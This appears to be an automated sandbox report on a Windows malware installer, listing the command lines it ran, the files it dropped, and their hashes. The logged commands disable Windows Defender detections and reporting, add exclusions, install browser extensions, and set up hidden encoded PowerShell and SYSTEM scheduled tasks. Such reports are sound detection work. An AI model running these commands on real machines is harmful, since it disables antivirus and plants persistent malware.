"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LCifMpYymZWU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LCifMpYymZWU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gbPxNkbXHfUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gbPxNkbXHfUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mVqQIGUXDOgrC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mVqQIGUXDOgrC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yvWovCiVU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yvWovCiVU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WkkDuRgYrrqHXcVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WkkDuRgYrrqHXcVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\IzRZTwSZebgYVSAl\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\IzRZTwSZebgYVSAl\" /t REG_DWORD /d 0 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gbPxNkbXHfUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gbPxNkbXHfUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mVqQIGUXDOgrC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mVqQIGUXDOgrC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yvWovCiVU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yvWovCiVU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WkkDuRgYrrqHXcVB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WkkDuRgYrrqHXcVB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\IzRZTwSZebgYVSAl /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\IzRZTwSZebgYVSAl /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gdpmmtWmH" /SC once /ST 04:41:13 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gdpmmtWmH"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gdpmmtWmH"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "ZJggANjsYpCqsGjEe" /SC once /ST 06:55:04 /RU "SYSTEM" /TR "\"C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe\" UK /jpsite_idMXE 385118 /S" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "ZJggANjsYpCqsGjEe"

C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe

C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe UK /jpsite_idMXE 385118 /S

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bCAdHbOFiqtMCRhbmR"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\yvWovCiVU\XssxXq.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "eGwAoTnpAObQfPU" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "eGwAoTnpAObQfPU2" /F /xml "C:\Program Files (x86)\yvWovCiVU\XVlIWUm.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /END /TN "eGwAoTnpAObQfPU"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "eGwAoTnpAObQfPU"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "ALvbXdfFiQJKEp" /F /xml "C:\Program Files (x86)\LCifMpYymZWU2\ueYJqSK.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "BIiSjOILpRnDn2" /F /xml "C:\ProgramData\WkkDuRgYrrqHXcVB\cCOsyeg.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "uCAhUOuaRBfXDMltv2" /F /xml "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\UZvEQmh.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "cLzKLCJHWfKFSkdKasF2" /F /xml "C:\Program Files (x86)\mVqQIGUXDOgrC\TowwiFL.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "kkPqOHrufYpxTagPJ" /SC once /ST 00:43:47 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\IzRZTwSZebgYVSAl\dtcklUpX\GDSPlEO.dll\",#1 /gTsite_idEKr 385118" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "kkPqOHrufYpxTagPJ"

C:\Windows\system32\rundll32.EXE

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\IzRZTwSZebgYVSAl\dtcklUpX\GDSPlEO.dll",#1 /gTsite_idEKr 385118

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\IzRZTwSZebgYVSAl\dtcklUpX\GDSPlEO.dll",#1 /gTsite_idEKr 385118

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "kkPqOHrufYpxTagPJ"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "ZJggANjsYpCqsGjEe"

Network

Files

C:\Users\Admin\AppData\Local\Temp\7zS7688.tmp\Install.exe

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_m42wc10s.ehb.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3528-35-0x00007FF97E400000-0x00007FF97EEC1000-memory.dmp

memory/2496-40-0x0000000010000000-0x00000000105E8000-memory.dmp

memory/3944-43-0x0000000073060000-0x0000000073810000-memory.dmp

memory/3944-45-0x0000000001440000-0x0000000001476000-memory.dmp

memory/3944-44-0x0000000000F60000-0x0000000000F70000-memory.dmp

memory/3944-46-0x0000000004010000-0x0000000004638000-memory.dmp

memory/3944-47-0x0000000003DB0000-0x0000000003DD2000-memory.dmp

memory/3944-48-0x00000000046B0000-0x0000000004716000-memory.dmp

memory/3944-49-0x0000000004720000-0x0000000004786000-memory.dmp

memory/3944-59-0x0000000004790000-0x0000000004AE4000-memory.dmp

memory/3944-60-0x0000000004D80000-0x0000000004D9E000-memory.dmp

memory/3944-61-0x0000000004DB0000-0x0000000004DFC000-memory.dmp

memory/3944-62-0x0000000000F60000-0x0000000000F70000-memory.dmp

memory/3944-65-0x0000000073060000-0x0000000073810000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 33b19d75aa77114216dbc23f43b195e3
SHA1 36a6c3975e619e0c5232aa4f5b7dc1fec9525535
SHA256 b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2
SHA512 676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821

memory/4148-67-0x0000000073060000-0x0000000073810000-memory.dmp

memory/4148-68-0x00000000035C0000-0x00000000035D0000-memory.dmp

memory/4148-69-0x00000000035C0000-0x00000000035D0000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 695285b42a109bf59d3e0fdc130fe35e
SHA1 9a665a148d5b3b89e2c28f8924abd0fe253d5b4d
SHA256 6747d6f7397b098cc9790d4adfc2b6ae1322f2ea991652d1de230584b4f2a5ed
SHA512 bffb5d8a9f5b0a43cff680b3b18de77a495fcf9f9196917b11dd3954ae9378c723eaf30ad13004e4f74af532d47480740e3a083006e87fe77ca154bc0c595479

memory/4148-81-0x00000000035C0000-0x00000000035D0000-memory.dmp

memory/4148-83-0x0000000073060000-0x0000000073810000-memory.dmp

C:\Windows\system32\GroupPolicy\gpt.ini

MD5 a62ce44a33f1c05fc2d340ea0ca118a4
SHA1 1f03eb4716015528f3de7f7674532c1345b2717d
SHA256 9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA512 9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log

MD5 6cf293cb4d80be23433eecf74ddb5503
SHA1 24fe4752df102c2ef492954d6b046cb5512ad408
SHA256 b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA512 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

memory/4116-88-0x00007FF97E400000-0x00007FF97EEC1000-memory.dmp

memory/4116-90-0x0000020679C40000-0x0000020679C50000-memory.dmp

memory/4116-89-0x0000020679C40000-0x0000020679C50000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a6c9d692ed2826ecb12c09356e69cc09
SHA1 def728a6138cf083d8a7c61337f3c9dade41a37f
SHA256 a07d329eb9b4105ba442c89f7cfa0d7b263f9f0617e26df93cf8cdc8dc94d57b
SHA512 2f27d2b241ce34f988c39e17ca5a1ebe628ac6c1b8ee8df121db9ad8929eaadf5f24ad66457591cccf87e60d2ba2eab88af860ab9c323a5c2a9867045d6e7ba3

memory/4116-102-0x00007FF97E400000-0x00007FF97EEC1000-memory.dmp

memory/1480-108-0x0000000010000000-0x00000000105E8000-memory.dmp

memory/1480-119-0x0000000002B90000-0x0000000002C15000-memory.dmp

C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

MD5 4b3b0c0c9e24f6362fa797ae5deb3bce
SHA1 95c101e95e4eeaf213d87c2c8cd657ccd5dd78b9
SHA256 2fb67cc3c92e505a942607a1a0499b53c1f3d2d79ae15b946deec5166ddce62d
SHA512 f3ba26fc33d17952d32772ba542128fb726c34b241079101a09d18da91f08ea8486027ccd67a88f3c06add8000a93b0a7e3dc975a103632039521287216c779c

memory/1480-161-0x0000000002F60000-0x0000000002FC5000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

MD5 238d2612f510ea51d0d3eaa09e7136b1
SHA1 0953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA512 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

MD5 2a1e12a4811892d95962998e184399d8
SHA1 55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA256 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512 bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

MD5 0b1cf3deab325f8987f2ee31c6afc8ea
SHA1 6a51537cef82143d3d768759b21598542d683904
SHA256 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA512 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

C:\Windows\system32\GroupPolicy\Machine\Registry.pol

MD5 af5a6b277700c3d5f2b18476dc79bf88
SHA1 cd73d9b216467ce5ef9c4ed007f21506bdcda9ce
SHA256 3bd8efb7779a1f95f313b9e441b865476c5ba63acfdebf0b6647413451b58ec9
SHA512 27649baa11485fb0f10638344c934df823c1546abb396f12ee1932bc03c663d6186c3b7720d6cbb7d3afe7b2765713e896d67cca02d736fd65142b4a1b30d611

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json

MD5 bd6b60b18aee6aaeb83b35c68fb48d88
SHA1 9b977a5fbf606d1104894e025e51ac28b56137c3
SHA256 b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55
SHA512 3500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b

C:\Program Files (x86)\yvWovCiVU\XVlIWUm.xml

MD5 b1269552401158d0e5ee8903ed13a45d
SHA1 dbbb3ed2bc36a11c251e09bdc83787f8a767aa2b
SHA256 779e9e765d439b302184fb08e465aa880da8000d469307c65ec39d32c1642352
SHA512 768725b595b631f1674dcc8fcbcc876e101ced0c82658a817a3518a1d0e95a6005cbc6bf7d8bd2b5c7d5d0f374c6248fdea4e298ee3bd0efc1a9e1b014d2d9a2

C:\Program Files (x86)\LCifMpYymZWU2\ueYJqSK.xml

MD5 eff67de9923d03a3f91f6aa2ce002ad6
SHA1 481555697db8204d7a7dd94db24ba3a986680864
SHA256 75748acf565608cf6f935f220ba4ac7e5ae2b5d6dd7724b1ec625950aab9a2c2
SHA512 ce90902beef31d1341535429af51444366577fb4df5fa4c95a2c096f15f18347a0adf7bcc8c38c0f787a257b61c75b8441812ed396154ac57c774b7945f80f09

C:\ProgramData\WkkDuRgYrrqHXcVB\cCOsyeg.xml

MD5 edcac4e3e3a9b66ab8aac5cdfcee2b16
SHA1 64ccaadd705bdcefe3a7f4adf268433143639256
SHA256 ab50d17f4cf46682a6e828d8e3d0d0fdbabd776c26043d4d3528b51de9718fe1
SHA512 0f787366d74fc5f4a520b4ac2695c3ba1a89eb4dc70daf68894ddaa081f556fda8b261bfb9a8fd7d736058afbbe648de912acf4f2c845248e578a76ecd78f7db

C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\UZvEQmh.xml

MD5 61a55f05dead9e59252bffad748dca04
SHA1 5cc5628dc813077d3ad54c48a00decf9d0db2104
SHA256 ab7bac0687a00f1fd10e4e337900ae8dc1c7a72ca811620a2b03b1777f09eec5
SHA512 d9645454103f0b70537967054112f34026e686b81ed12bf8f478ef0e4412d2219d5cf33685648a35e0286d80592954a368d9f7b93d443f4a2e1083ab32b0d5a5

C:\Program Files (x86)\mVqQIGUXDOgrC\TowwiFL.xml

MD5 315eb76dd743d4dd464f26537d2ef3e7
SHA1 eb09261f83548e89fccbde349751a99cdc6c77a9
SHA256 2c90f8f7017d0e83c29783c781f105386ca9d0df18a4c141c6d8ec0d359b651f
SHA512 2c7bf3422a23b09e550afd49d09f7156a9747fbf6ca0c9a2da04342d48a271b278e3ead06236048e4878f6669489b00547855e6acf89d703391092869fc6ab38

C:\Windows\Temp\IzRZTwSZebgYVSAl\dtcklUpX\GDSPlEO.dll

MD5 fdcc0ef7b4cb82035c51f55cfece6cf1
SHA1 ee1d2e870309f5ba05e0216d3ea909c1ae9d8ee4
